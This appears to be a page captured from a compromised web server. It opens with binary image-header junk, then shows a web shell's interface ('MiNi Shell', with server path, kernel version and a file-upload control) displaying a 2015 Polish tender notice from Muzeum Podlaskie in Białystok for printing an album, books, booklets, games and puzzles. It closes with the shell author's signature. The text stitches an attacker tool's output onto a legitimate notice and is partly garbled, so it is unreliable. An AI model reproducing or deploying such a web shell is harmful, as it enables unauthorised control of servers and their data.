JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150618/147746-N-2015.html

<p class="kh_header"><b>Białystok: Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu (sprawdzenie pod względem językowym i gramatycznym), skład, druk albumu, książki, zeszytów edukacyjnych, informatorów, gier, puzzli wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2015.</b><br>
<b>Numer ogłoszenia: 147746 - 2015; data zamieszczenia: 18.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu (sprawdzenie pod względem językowym i gramatycznym), skład, druk albumu, książki, zeszytów edukacyjnych, informatorów, gier, puzzli wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Szczegółowy opis przedmiotu zamówienia:  

Część I zamówienia.  
Usługa poligraficzna przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu (sprawdzenie pod względem językowym i gramatycznym), skład, druk albumu i książki wraz z dostawą do siedziby Zamawiającego.

1.	Album
RĘCZNIK LUDOWY Z OKOLIC BIELSKA PODLASKIEGO - HAFT I KORONKA 
format 300 x 270 cm (pion), środek obj. 144 str., kreda mat. 150g (w tym: pierwsze 12 stron kolor 1+1, 120 stron kolor 4+4, końcowe 12 stron kolor 1+1), oprawa twarda szyta nićmi, oklejka 130 g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 1000 egz., 
wydawnictwo posiada Nr ISBN, 
Tylko druk wydawnictwa, Muzeum dostarczy gotowy projekt do druku
Termin realizacji do 15 sierpnia 2015r.

2.	Książka
książka Ikonosfera, zeszyt 3 
format B5 (170 x 240 mm),  środek obj. ok. 100 str., kreda mat. 135 g,  kolor 4+4, oprawa miękka, klejona, okładka karton z białym spodem 240 g, kolor 4+0+ lakier punktowo +folia matowa, nakład 350 egz. wydawnictwo posiada Nr ISSN
Termin realizacji do 31 sierpnia 2015r.


Część II zamówienia.  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład, druk zeszytów edukacyjnych, informatorów, gier, puzzli wraz z dostawą do siedziby Zamawiającego.

1.	Informator zeszyt edukacyjny

wzornik haftu, format B5 poziom - 235 x 165 mm, środek: 36 stron, kreda mat. 150g, kolor 4+4, okładka kreda 300 g, kolor 4+1, lakier offsetowy, szycie zeszytowe, nakład 2 wzorniki x 1000 egz.
Tylko druk wydawnictwa, Muzeum dostarczy wydawnictwa przygotowane do druku (do naniesienia drobne poprawki)
Termin realizacji do 15 sierpnia 2015r.


2.	Zeszyt edukacyjny dla dzieci (Sokolarnia)

format A4, 20 stron, papier offset 120 g, kolor 4+4, szycie zeszytowe, okładka karton 200 g., kolor 4+0+folia błyszcząca, nakład 2.000 egz.  
Tylko druk wydawnictwa, Muzeum dostarczy wydawnictwa przygotowane do druku
Termin realizacji do 30 sierpnia 2015r.

Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn. Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

3.	Teczka z pakietem edukacyjnym
Teczka edukacyjna, format A4, karton 300g, skrzydełka od boku i od dołu - 65 mm z nacięciem do łączenia, podwójne bigowania na zgięciach, kolor 4 + 0 (+lakier), wkładka - karty pracy format A4 - 10 szt., papier offset 220 g., kolor 4+4, 1 karta samoprzylepna formatu A4 (druk na folii), kolor 4+0, nakład 500 egz. 
Termin realizacji do 31 października 2015r.

4.	Gra planszowa
gra planszowa do zajęć w Sokolarni, plansza do gry formatu A3 składana w połowie do formatu A4, miejsce złożenia zabezpieczone naklejoną taśmą z tkaniny. Na karton 1,9 mm naklejony papier o gramaturze 80g zadrukowany - kolor 4+0+folia błyszcząca, nakład 2.000 egz.
Tylko druk wydawnictwa, Muzeum dostarczy wydawnictwa przygotowane do druku
Termin realizacji do 30 sierpnia 2015r.
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014


5.	Puzzle
puzzle dla Sokolarni, format A4, rysunek pocięty na 16 części, na karton 1,9 mm naklejony papier o gramaturze 80g zadrukowany - kolor 4+0+folia błyszcząca, 6 układanek (rysunków) po 100 sztuk każda - ogółem 600 sztuk 
Każda układanka pakowana w torebkę strunową 150mmx200mm. Na torebce etykieta 150mmx200mm, druk na papierze samoprzylepnym, kolor 4+0+folia błyszcząca, nakład 600 szt.
Tylko druk puzzli. Zamawiający dostarczy materiał gotowy do druku
Termin realizacji do 30 sierpnia 2015r.
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

6.	Zaproszenia
Format A5 składane do A6 (pion), kreda mat. 250 g., nakład 300 szt.
Termin realizacji do 21 sierpnia 2015 r. 
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

7.	Plakat 
Format A1, kreda 180 g., kolor 4+0, nakład 300 szt.
Termin realizacji do 21 sierpnia 2015
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

8.	Plakat 
Format Plakat format 100 cm x 30 cm poziom, papier posterowy blueback, kolor 4+0, nakład 100 szt.
Termin realizacji do 21 sierpnia 2015
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Część II przedmiotu zamówienia - do 20 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 78.20.00.00-9, 78.22.00.00-5, 78.22.50.00-0, 78.21.00.00-1, 78.12.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie i uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie uznany za spełniony, jeżeli Wykonawca przedstawi wykaz co najmniej 2 zamówień - każde odpowiadające swoim rodzajem przedmiotowi niniejszego zamówienia na które składana jest oferta, zrealizowanych przez Wykonawcę w ciągu ostatnich 3 lat poprzedzających termin otwarcia ofert, z podaniem ich wartości nie mniejszej niż:  
I część zamówienia: 30.000,00 zł brutto 
II część zamówienia:  30.000,00 zł brutto , 
oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że zamówienia  te zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie i uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie i uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie i uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony zgodnie z treścią i podpisany formularz Oferta, stanowiący Załącznik      Nr 1, 1a do SIWZ  
2)	Podpisane oświadczenie o akceptacji warunków postępowania, w tym warunków umowy,  stanowiące Załącznik Nr 8 do SIWZ  
3)	Oświadczenie o realizacji zamówienia samodzielnie lub przy pomocy podwykonawców stanowiące Załącznik Nr 7 do SIWZ.  
4)	Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo  świadczenie o tym, że nie należy do grupy kapitałowej.   Załącznik Nr 9 SIWZ  
5)	Pełnomocnictwo do podpisania oferty i innych dokumentów, jeżeli upoważnienie do ich złożenia nie wynika z przepisów bądź zapisów właściwego rejestru.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie w Białymstoku
Ratusz Rynek Kościuszki 10
15-426 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2015 godzina 09:30, miejsce: Muzeum Podlaskie w Białymstoku
Ratusz Rynek Kościuszki 10
15-426 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część wydruków realizowana jest  w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu (sprawdzenie pod względem językowym i gramatycznym), skład, druk albumu i książki wraz z dostawą do siedziby Zamawiającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Album
RĘCZNIK LUDOWY Z OKOLIC BIELSKA PODLASKIEGO - HAFT I KORONKA 
format 300 x 270 cm (pion), środek obj. 144 str., kreda mat. 150g (w tym: pierwsze 12 stron kolor 1+1, 120 stron kolor 4+4, końcowe 12 stron kolor 1+1), oprawa twarda szyta nićmi, oklejka 130 g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 1000 egz., 
wydawnictwo posiada Nr ISBN, 
Tylko druk wydawnictwa, Muzeum dostarczy gotowy projekt do druku
Termin realizacji do 15 sierpnia 2015r.

2.	Książka
książka Ikonosfera, zeszyt 3 
format B5 (170 x 240 mm),  środek obj. ok. 100 str., kreda mat. 135 g,  kolor 4+4, oprawa miękka, klejona, okładka karton z białym spodem 240 g, kolor 4+0+ lakier punktowo +folia matowa, nakład 350 egz. wydawnictwo posiada Nr ISSN
Termin realizacji do 31 sierpnia 2015r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 78.20.00.00-9, 78.22.00.00-5, 78.22.50.00-0, 78.21.00.00-1, 78.12.40.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład, druk zeszytów edukacyjnych, informatorów, gier, puzzli wraz z dostawą do siedziby Zamawiającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Informator/zeszyt edukacyjny

wzornik haftu, format B5 poziom - 235 x 165 mm, środek: 36 stron, kreda mat. 150g, kolor 4+4, okładka kreda 300 g, kolor 4+1, lakier offsetowy, szycie zeszytowe, nakład 2 wzorniki x 1000 egz.
Tylko druk wydawnictwa, Muzeum dostarczy wydawnictwa przygotowane do druku (do naniesienia drobne poprawki)
Termin realizacji do 15 sierpnia 2015r.


2.	Zeszyt edukacyjny dla dzieci (Sokolarnia)

format A4, 20 stron, papier offset 120 g, kolor 4+4, szycie zeszytowe, okładka karton 200 g., kolor 4+0+folia błyszcząca, nakład 2.000 egz.  
Tylko druk wydawnictwa, Muzeum dostarczy wydawnictwa przygotowane do druku
Termin realizacji do 30 sierpnia 2015r.

Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

3.	Teczka z pakietem edukacyjnym
Teczka edukacyjna, format A4, karton 300g, skrzydełka od boku i od dołu - 65 mm z nacięciem do łączenia, podwójne bigowania na zgięciach, kolor 4 + 0 (+lakier), wkładka - karty pracy format A4 - 10 szt., papier offset 220 g., kolor 4+4, 1 karta samoprzylepna formatu A4 (druk na folii), kolor 4+0, nakład 500 egz. 
Termin realizacji do 31 października 2015r.

4.	Gra planszowa
gra planszowa do zajęć w Sokolarni, plansza do gry formatu A3 składana w połowie do formatu A4, miejsce złożenia zabezpieczone naklejoną taśmą z tkaniny. Na karton 1,9 mm naklejony papier o gramaturze 80g zadrukowany - kolor 4+0+folia błyszcząca, nakład 2.000 egz.
Tylko druk wydawnictwa, Muzeum dostarczy wydawnictwa przygotowane do druku
Termin realizacji do 30 sierpnia 2015r.
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014


5.	Puzzle
puzzle dla Sokolarni, format A4, rysunek pocięty na 16 części, na karton 1,9 mm naklejony papier o gramaturze 80g zadrukowany - kolor 4+0+folia błyszcząca, 6 układanek (rysunków) po 100 sztuk każda - ogółem 600 sztuk 
Każda układanka pakowana w torebkę strunową 150mmx200mm. Na torebce etykieta 150mmx200mm, druk na papierze samoprzylepnym, kolor 4+0+folia błyszcząca, nakład 600 szt.
Tylko druk puzzli. Zamawiający dostarczy materiał gotowy do druku
Termin realizacji do 30 sierpnia 2015r.
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

6.	Zaproszenia
Format A5 składane do A6 (pion), kreda mat. 250 g., nakład 300 szt.
Termin realizacji do 21 sierpnia 2015 r. 
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

7.	Plakat 
Format A1, kreda 180 g., kolor 4+0, nakład 300 szt.
Termin realizacji do 21 sierpnia 2015
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

8.	Plakat 
Format Plakat format 100 cm x 30 cm poziom, papier posterowy blueback, kolor 4+0, nakład 100 szt.
Termin realizacji do 21 sierpnia 2015
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 78.20.00.00-9, 78.22.00.00-5, 78.22.50.00-0, 78.21.00.00-1, 78.12.40.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com